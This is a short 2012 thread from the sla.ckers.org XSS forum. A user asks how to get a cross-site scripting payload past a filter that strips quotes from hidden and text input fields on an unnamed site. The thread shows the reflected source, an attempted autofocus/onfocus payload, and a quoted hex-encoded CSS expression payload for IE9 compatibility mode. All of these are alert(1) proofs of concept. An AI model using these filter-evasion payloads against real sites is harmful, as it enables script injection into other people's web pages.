Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Close but no cigar, help for the final hurdle?
Date: March 03, 2012 06:43PM

'"(){}/\<> - test chars

Results in source:

<input type="hidden" name="pageURL" value= (){}/\>

and bit further down:

<input type="text" name="link" id="link" style="width:400px" value=" (){}/\"/>


Can't think of any input type xss which doesn't use ' " ', can anyone help?

Closest I have got:

<input type="hidden" name="pageURL" value=/ AUTOFOCUS onfocus=alert(1) >
[but no alert]

[using Firefox, but any browser would be a help]

TheGreatEscape

Options: ReplyQuote
Re: Close but no cigar, help for the final hurdle?
Posted by: Albino
Date: March 04, 2012 05:27AM

I think this will work without quotes >>

Gareth Heyes Wrote:
-------------------------------------------------------
> Iframe the target site with the parent in compat
> mode then inject this:
> "style="xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6
> c\65\72\74\28\31\29\29"
>
> This will work on IE9 since the child inherits the
> parent compat mode

-------------------------------------------------------
Research blog

Options: ReplyQuote
Re: Close but no cigar, help for the final hurdle?
Date: March 04, 2012 02:12PM

That has quotation marks which are filtered, unless I misunderstand something.

Options: ReplyQuote


Sorry, only registered users may post in this forum.